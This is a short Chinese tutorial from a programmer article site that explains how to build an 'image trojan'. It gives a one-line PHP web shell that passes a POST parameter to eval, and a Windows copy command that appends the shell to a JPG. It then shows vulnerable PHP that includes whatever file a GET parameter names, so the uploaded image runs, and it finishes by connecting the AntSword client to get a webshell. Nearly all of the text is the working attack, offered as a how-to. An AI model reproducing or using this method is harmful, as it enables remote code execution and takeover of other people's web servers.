一句话图片木马
程序员文章站
2022-05-27 13:39:35
...
一句话图片木马
一、准备图片木马
1、准备任意图片pho.jpg
2、准备木马文件hack.php
<?php @eval($_POST['hack']);?>
3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg
copy pho.jpg/b+hack.php/a hack.jpg
b二进制格式,a为ASCII
二、上传图片
三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行)
1、
右键图片复制图片地址,找到图片木马具体位置(upload//4820200820225424.jpg)
2、访问include.php
<?php
$file = $_GET['file'];
include $file;
?>
可以看到,include.php引用参数file文件,并且都当成php文件执行,file=木马图片位置,这样图片内的php木马代码就可以得以解析
四、蚁剑连接
url地址指向文件包含漏洞的地址
右键文件管理拿到webshell
上一篇: 一句话木马
下一篇: 图片一句话木马的简单制作